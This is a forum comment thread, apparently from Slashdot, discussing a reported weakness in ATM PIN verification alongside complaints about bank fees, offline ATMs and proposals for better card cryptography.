In debit-capable equipment, the PIN is encrypted immediately within the keypad itself, a sealed assembly - that heavy PIN pad the cashier hands you that feels like a block of epoxy - it is. In the real POS world (those systems certified to directly connect to financial networks - not the Internet), no provision is made for the systems to self-verify the PIN like the teller machines described in the attack, hence they lack that vulnerability. PIN verification is the responsiblity of the network. If the network is down, so is the service.

Re:Article got /.ed. Text of the article below:

eat my -1 the-server-is-fast-for-me (redundant) moderation, you karma whore.

Another Citibank coverup

Didn't Citibank learn anything from the Russians hacking their systems? Fah, I hate corporate subcultures. They're more subversive than anything Ashcroft can put forward.

Rick

You know what sucks about this?

[PotatoHead]

Is that you can do nothing about it!

The banks current position is that everything works fine. Afterall, they do handle the world economy everyday, so your little small potatoes checking account is no big deal right?

Unless you can demonstrate a bank error that meets their criteria I might add, the bank basically says you must pay all fees like it or not.

So, let me tell you from experience, you are screwed. Either you pay even though you may not be totally in the wrong, or you don't.

If you pay, you will be out some cash, but the bank will be happy to let you continue doing business and will even screw you again later if you are willing.

If you don't pay, it gets worse. They charge off your account so they can get the tax benefit. They still send you to collections, and they report you to ChexSystems. This database will record your debt to your current bank and will be used as the reason you cannot get new accounts elsewhere. 95% of all banks use this. Getting a record removed is very difficult. The worst part is that even if you pay at this stage, your record will last for 7 years.

Big banks really suck right now. There are only a few laws they must follow, the rest are rules and regulations they get to set for us without our feedback. Big banks are greedy and are making more money each year. They charge fees for almost anything and have no reasonable appeal process. Currently the larger banks are even beginning to charge check cashing fees on their own checks!

You could write me a check for $5.00 and it could be worth nothing if I presented to the bank it was drafted on.

My advice to you would be to pay that bank, and realize that (1) you have no power here. --Trust me I tried hard to work through a problem with my bank and could not and (2) big banks are not working in your best interests.

Keep your banking record clean and look for a smaller bank that actually wants your business and will serve you as needed to keep it.

Things to look for:

- Low fees across the board.

- Daily caps on overdraft charges to prevent cascading fees. (This is what happened to me. $300 turned into $1100 in a couple of days !?!)

- Teller access without fees

- Reasonable ATM policy. No double dipping ATM transactions. Some bigger banks can and do charge you for use of a free ATM even though the ATM owner does not!

For those wondering, the banks that I have found particularly nasty are:

US Bank

Beginning to impose check cashing fees, highest overdraft charge with no daily cap, poor deposit policy. They hold every check they can for three days. Their own tellers advise you to cash your check then deposit cash.

Key Bank

Very strict on transaction type. Will freeze accounts for very little reason. A disagreement with a teller is enough for this. Check cashing fees with no daily cap. Poor deposit policy combined with their allowed transaction types make some common deposits very difficult.

Both banks guilty of transaction ordering with intent to charge fees. Basically they will clear large checks in order to let many smaller ones bounce. They say it is for your own good, but realistically which is better? Personally, I would rather reissue the larger check, pay the fees and use the rest of my money to cover the damage as cheap as I can. You decide.

Both banks guilty of issuing dangerous check cards by default. Check card works like credit, but with none of the protections.

All this talk of PIN theft is one thing, losing one of these cards is way worse. They can use it any number of places without a PIN and you have to pay.

Personally, the errors are likely to be unstated fees for transactions. Many places charge a fee when you use a debit card. Not all of them let you know about it even though they should. Another error comes from charges when you pay for dinner out. Remember the little place on the receipt for tips? If you don't fill it out, they can later. Problem here is that you don't always get to see the amount they key into the little visa machine. Your copy says one thing, theirs says another..

Seriously, if you are banking with a larger bank, ditch it and go shopping and tell your friends when you are done. You will be better for it.

One other thing I forgot

[PotatoHead]

In the last few years reports have been written about ways banks can increase revenue. In the early 90's the easiest way was to increase fees.

There are consultants that will analyze a banks customer transaction histories in order to recommend a fee structure that will retain the highest number of customers and generate the most revenue from fees while lowering costs.

They do this with the teller fee, minimum balance fee, account inactivity fee and the overdraft fee.

Recently the check cashing fee was added to both make money on both the check writer and the casher while discouraging face to face business at the bank which lowers costs.

The high growth of bank profits combined with growing negative public perception of the fees has recently sparked a few recommendations toward more reasonable structures that actually do help people and the bank without so much profit.

Try and find a couple of those. They get almost zero notice.

See how it works? Remember that the next time you read a shiny well produced brochure that 'assures' you that no other bank is working harder for you.

You might be surprised in to know

[abhisarda]

that in India, there are many ATM's(not all) that do not connect to the main server when you withdraw money.

There are many people here who have withdrawn 5000 Rs(100 $) a day for days together even when the balance in their checking account was less than 100 $ in the first place. If you have overdrawn your account, you are sent a mail(snail) or the bank gives you a call to collect the money. The time limit in which you withdraw money without any problem is 3 days to 15 days.

That is why some banks here give credit/debit cards only to customers who have had a 100 $ minimum balance over a period of 2 years.

See, it's those damn OS/2 16-bit programmers

See, it's those damn OS/2 16-bit programmers. Good for nothings.

Re:ATM? (pic)!

A bit off-topic, but here's a train timetable board
running windows. The trains in paris were three four hours late that day. I wonder why ;)

http://sinex.hut.mediapoli.com/juhapics/slide.cg i? dir=Ranska&pic=7

Looks like...

..the problem is that the ATM needs to at the very least verify that the PIN is right irrespective of whether it is online or offline with the bank database. Therefore the offsets need to be present for each account number at every ATM point. The entire paper is based on a bank employee having access to change the code and insert his keyset for mapping to find out which numbers form part of the key.
As it is,whether it is a four,five or six digit pin doesnt matter if a bank employee has access to the system.
If an ATM cannot be online with the bank database is there a need to verify the PIN. Isnt that an inherent security risk?..

This is the result of CRUDDY analysis of security

It should have been clear from the beginning that when you put thousands of copies of a system master key out in the field, it would eventually be compromised. The sad thing is that this crack means accounts can be compromised by faking cards without even the thieves having to have a real card. If for example some other secret were on the key and used as part of what got used to generate the PIN, then at least the real ATM cards would be needed also in stealing money from an account. This need not be fancy. Another secret key, unknown to the ATM, could be used and one or a few digits of a crypt of an acct number with that key stored on the card. Getting fancy with public/private keys to private-crypt a pin and storing it on card isn't necessary (even if there were room which there isn't).

It has been a basic tenet of security that you don't trust information that is placed in untrustworthy places, and there have been plenty of articles about people analyzing "secure" hardware modules given time. All it would take is some period where a store that has an ATM in it is closed for long enough to open up the ATM, get the bits out, run analysis, and perhaps even put them back. In all these years since ATMs were first released something of the kind must have happened, to generate the bogus charges that are now taking place.

It is probably feasible to do a remedy by using a character or two in the magnetic stripe, but it would mean at least that the ability of every ATM that is now able to work without connecting to the card issuer bank to do that would be lost. I suspect that the ability of these machines to function when they WERE connected might be salvagable, though, which would mean most ATMs would be flaky a bit oftener but could still work. The main problem is that for something to depend on a secret on the ATM card magstripe, all the ATM CARDS would have to be replaced. If you get a new ATM card from your bank, you will know this is possible. I suspect too that not all banks will have done anything this dumb. If they had it would suggest that every ATM would be a bonanza with secret keys for multiple bank systems, or that entire networks of banks all used the same key...another egregious security misdesign. The principles have been around at least as long as before the Orange Book came out (check the old literature!) and even with the attempts at crypto control that went way back too, banking was understood to need decent crypto and was always allowed to do it right. Banks that did this are victims of their own stupidity (or perhaps it should be said, victims of the stupidity or unwillingness to read about the subject of some employees who may by this time be long retired or dead; I can't believe anyone today would make this mistake.)

Re:PINs can't work, only RSA will do. Nope, hashes

If they'd ask for the password/pin before issuing the card (or at least, before writing the magnetic stripe stuff) they could just do a crypto hash of the password and store that, possibly with a salt based on something like card number. It works in computers. Why not on cards? Also then the thing could be a bit longer without having to store the whole thing. If you really got stuck and could store only half the hash on the card, well, that would probably work better than the current system.

history repeats itself

[Hubert_Shrump]

Ross Anderson talks about this (here) having happened sometime in the 80's when ATMs were first launched in the UK - and how the banks 'conspired' together to keep videocams out of the ATMs so that these phantom withdrawls could be foisted off as 'forgetfulness' on the customer's part.

Intresting book -- ~1 typos per page, though. Burns the eyes of an English Major.

ATMs in malls and convenience stores swipe only

The ATMs in convenience stores in the Philadelphia area at least, and in malls, just have you swipe the card. They do not accept deposits but do give money and some of them, balance inquiry replies.

single DES?

[karlm]

Umm... how often do they change the DES key?

10 Free Checking accounts with ATM cards ... $0
1000 FPGAa at 200 MHz ... $5,000
Beer and Pizza for 100 all-nighters ... $1,000
Everyone's PINs... priceless
Some things money can't buy, for everything else there's CitiBank.

Re:counting money in front of the camera is no pro

[Rob+Parkhill]

Yup, that's pretty much what they do. I had an ATM short me over $100 once (it crapped out while spitting out the cash), and the bank was up-front and told me that if there was $X too much in the machine at the end of the day, they would credit my account. There was, and they did.

that was about as funny...

...as a truck-load of dead babies

Having a secure verification is simple

At least it is simple if you have some space
to store things.

Consider: suppose you want a system with no system wide r/w keys anywhere in the field.

If you encrypt a secret key with a private rsa key and put this on each card, at the atm you could use the public rsa key to decrypt the secret key and use that to store secret key encrypted stuff on the card. Encrypt card number with the private key and store that too, and you can check the card is valid. But you need more magstripe tracks or other storage. Make sure every card has different secret keys and there's no global key anywhere except where you make them. Someone can still record the data though, but can't generate it from nothing unless he/she can get to the data at the manufacturing site. However this is useless against data recording devices that record cards.

People recording valid cards and playing them back cannot be stopped so simply; that requires something more involved than a simple data store and may not be solvable at all by simple designs. The storage in normal atm or credit cards is way too small for this kind of trick, and simple storage can be simply copied, cleartext or not. If someone used the crock above, a valid card could still be jiggered even w/o a global symmetric key.

Last Post!

[alpg]

Bypasses are devices that allow some people to dash from point A to
point B very fast while other people dash from point B to point A very
fast. People living at point C, being a point directly in between, are
often given to wonder what's so great about point A that so many people
from point B are so keen to get there and what's so great about point B
that so many people from point A are so keen to get _____there. They often
wish that people would just once and for all work out where the hell
they wanted to be.
-- Douglas Adams, "The Hitchhiker's Guide to the Galaxy"

- this post brought to you by the Automated Last Post Generator...